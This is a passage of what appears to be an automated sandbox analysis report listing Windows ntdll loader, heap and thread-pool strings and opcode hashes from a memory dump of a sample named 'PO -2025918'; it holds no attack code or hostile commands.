                                                                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-1918872054
                                                                                                                            Strings
                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01C022B6
                                                                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01C021D9, 01C022B1
                                                                                                                            • .Local, xrefs: 01BC28D8
                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 01C021DE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                            • API String ID: 0-1239276146
                                                                                                                            Strings
                                                                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01C03456
                                                                                                                            • RtlDeactivateActivationContext, xrefs: 01C03425, 01C03432, 01C03451
                                                                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01C0342A
                                                                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01C03437
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                            • API String ID: 0-1245972979
                                                                                                                            Strings
                                                                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01BF10AE
                                                                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01BF0FE5
                                                                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01BF1028
                                                                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01BF106B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                            • API String ID: 0-1468400865
                                                                                                                            Strings
                                                                                                                            • apphelp.dll, xrefs: 01BB2462
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01BFA9A2
                                                                                                                            • LdrpDynamicShimModule, xrefs: 01BFA998
                                                                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01BFA992
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-176724104
                                                                                                                            Strings
                                                                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01BA327D
                                                                                                                            • HEAP: , xrefs: 01BA3264
                                                                                                                            • HEAP[%wZ]: , xrefs: 01BA3255
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                            • API String ID: 0-617086771
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                            • API String ID: 0-4253913091
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $@
                                                                                                                            • API String ID: 0-1077428164
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                            • API String ID: 0-2779062949
                                                                                                                            Strings
                                                                                                                            • Failed to allocated memory for shimmed module list, xrefs: 01BFA10F
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01BFA121
                                                                                                                            • LdrpCheckModule, xrefs: 01BFA117
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-161242083
                                                                                                                            Strings
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01C082E8
                                                                                                                            • Failed to reallocate the system dirs string !, xrefs: 01C082D7
                                                                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 01C082DE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-1783798831
                                                                                                                            Strings
                                                                                                                            • PreferredUILanguages, xrefs: 01C4C212
                                                                                                                            • @, xrefs: 01C4C1F1
                                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01C4C1C5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                            • API String ID: 0-2968386058
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                            • API String ID: 0-1373925480
                                                                                                                            Strings
                                                                                                                            • LdrpCheckRedirection, xrefs: 01C1488F
                                                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01C14888
                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01C14899
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                            • API String ID: 0-3154609507
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                            • API String ID: 0-2558761708
                                                                                                                            Strings
                                                                                                                            • LdrpInitializationFailure, xrefs: 01C120FA
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01C12104
                                                                                                                            • Process initialization failed with status 0x%08lx, xrefs: 01C120F3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-2986994758
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: #%u
                                                                                                                            • API String ID: 48624451-232158463
                                                                                                                            Strings
                                                                                                                            • LdrResSearchResource Exit, xrefs: 01B9AA25
                                                                                                                            • LdrResSearchResource Enter, xrefs: 01B9AA13
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                            • API String ID: 0-4066393604
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: `$`
                                                                                                                            • API String ID: 0-197956300
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID: Legacy$UEFI
                                                                                                                            • API String ID: 2994545307-634100481
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$MUI
                                                                                                                            • API String ID: 0-17815947
                                                                                                                            Strings
                                                                                                                            • kLsE, xrefs: 01B90540
                                                                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01B9063D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                            • API String ID: 0-2547482624
                                                                                                                            Strings
                                                                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 01B9A309
                                                                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 01B9A2FB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                            • API String ID: 0-2876891731
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID: Cleanup Group$Threadpool!
                                                                                                                            • API String ID: 2994545307-4008356553
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: MUI
                                                                                                                            • API String ID: 0-1339004836
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-3916222277
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-3916222277
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: GlobalTags
                                                                                                                            • API String ID: 0-1106856819
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .mui
                                                                                                                            • API String ID: 0-1199573805
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: EXT-
                                                                                                                            • API String ID: 0-1948896318
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: BinaryHash
                                                                                                                            • API String ID: 0-2202222882
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #
                                                                                                                            • API String ID: 0-1885708031
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: BinaryName
                                                                                                                            • API String ID: 0-215506332
                                                                                                                            Strings
                                                                                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01C1895E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                            • API String ID: 0-702105204
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                            • Instruction ID: 823dfa304a9e4976ae3a3323f9a4a9a4807e0fd764c22a33cf4f9fb6f50cfca8
                                                                                                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                            • Instruction Fuzzy Hash: F5B1F731608646AFDB2DEB68C890BBEBBF6EF48300F5401D9E656D7281DB30D945CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: df3f2513882a571580da1bf4961af170f4226efdf4a1c3a79b3cfadd3bc11ffd
                                                                                                                            • Instruction ID: 4a9f0e0de6e644a8fd041731ff66469e0e730e71bffe9198362d231783d874cc
                                                                                                                            • Opcode Fuzzy Hash: df3f2513882a571580da1bf4961af170f4226efdf4a1c3a79b3cfadd3bc11ffd
                                                                                                                            • Instruction Fuzzy Hash: 4CC15974108345CFDB68CF19C494BAAB7E5FF88304F4449ADEA8987291D774E909CF92
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c6f6c63d772db8c5af163fd0501743c2acd13ed48c5d7f06d0866e4536e970e8
                                                                                                                            • Instruction ID: d6d6131ef4efc1832d82c83693eac491d9f247c2593e91b04487531c09ac09c2
                                                                                                                            • Opcode Fuzzy Hash: c6f6c63d772db8c5af163fd0501743c2acd13ed48c5d7f06d0866e4536e970e8
                                                                                                                            • Instruction Fuzzy Hash: 26B16270A002668BDB68DF68C890BE9B7F5EF44704F1485E9D50AE7291EB70DD85CB31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2a991ed934fd20ec61d314f929d121688d77c63bf87a6ad21d887cc91135cc9d
                                                                                                                            • Instruction ID: 9ce2749d6969312d09bc3437597174afa05269a06cfac2177aaa1c9595df8b0f
                                                                                                                            • Opcode Fuzzy Hash: 2a991ed934fd20ec61d314f929d121688d77c63bf87a6ad21d887cc91135cc9d
                                                                                                                            • Instruction Fuzzy Hash: FBA1F732E006559FEF299B98C884BFDBBB4EB01710F050299EB11AB6A1D7B4DD44C7D1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 43516419389955f2e1d9279084b30b2a83a7591aa99049d4d7388b1e1d95b2c8
                                                                                                                            • Instruction ID: 34aee62a15892ce0d3b1a6f5799dd13f3630b883fd341a4fcfccbf187e67c862
                                                                                                                            • Opcode Fuzzy Hash: 43516419389955f2e1d9279084b30b2a83a7591aa99049d4d7388b1e1d95b2c8
                                                                                                                            • Instruction Fuzzy Hash: DCA1E270B01616DFDB2DEF69C990BAAB7B5FF54314F004169EA49D7282EB34E901CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7cd37f63a20ab3bf0ecf440087004fda64a5ed306cbe7afcc488164c8918430c
                                                                                                                            • Instruction ID: 32a4ab860ad30c8eda81a4d527e2c5f88c72321c718faa2e05bfc9464695a90c
                                                                                                                            • Opcode Fuzzy Hash: 7cd37f63a20ab3bf0ecf440087004fda64a5ed306cbe7afcc488164c8918430c
                                                                                                                            • Instruction Fuzzy Hash: A9A1EE72A04252EFCB2ADF18C9C0B5ABBE9FF58708F450568E589DB651D334EE01CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                            • Instruction ID: a2073cda2e334a671d7224ad4b9a3090dfa30747b3063112289d64bbb3a648af
                                                                                                                            • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                            • Instruction Fuzzy Hash: 6AB15B71E0061ADFDF29CFA9C880AADBBB9FF58340F148169E915A7354D730EA41CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9ad7e4901c9ee4038e6eeb0e11b8b0aeca6ab6c9258a082446625bc48f686bb3
                                                                                                                            • Instruction ID: 6bfe55f77d7c2f552b9cf99d1c1de8bab3e4c10d90811c5dfe23879ffdaed99a
                                                                                                                            • Opcode Fuzzy Hash: 9ad7e4901c9ee4038e6eeb0e11b8b0aeca6ab6c9258a082446625bc48f686bb3
                                                                                                                            • Instruction Fuzzy Hash: 5E91C471D40226EFDF15CFA9D884BBEBBB5AF4A710F144159E601EB344D7B4DA00ABA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fe67721985aa0700950c8a6d6c1f066fd80b7ca80442d2890989964aad3127c7
                                                                                                                            • Instruction ID: 5aa4ec9ddd735cba2789ee368c6c660021874edf418db27eb4bba442dbf78d60
                                                                                                                            • Opcode Fuzzy Hash: fe67721985aa0700950c8a6d6c1f066fd80b7ca80442d2890989964aad3127c7
                                                                                                                            • Instruction Fuzzy Hash: D6914631A04616CBEB2CDB5CD480B7EBBA5EF94718F4581E9EA459B380EB34DD01CB61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e10f83a590949dcd6402d1592101a8ea1427dcba9bf9ef56fbfc9ee94237bd87
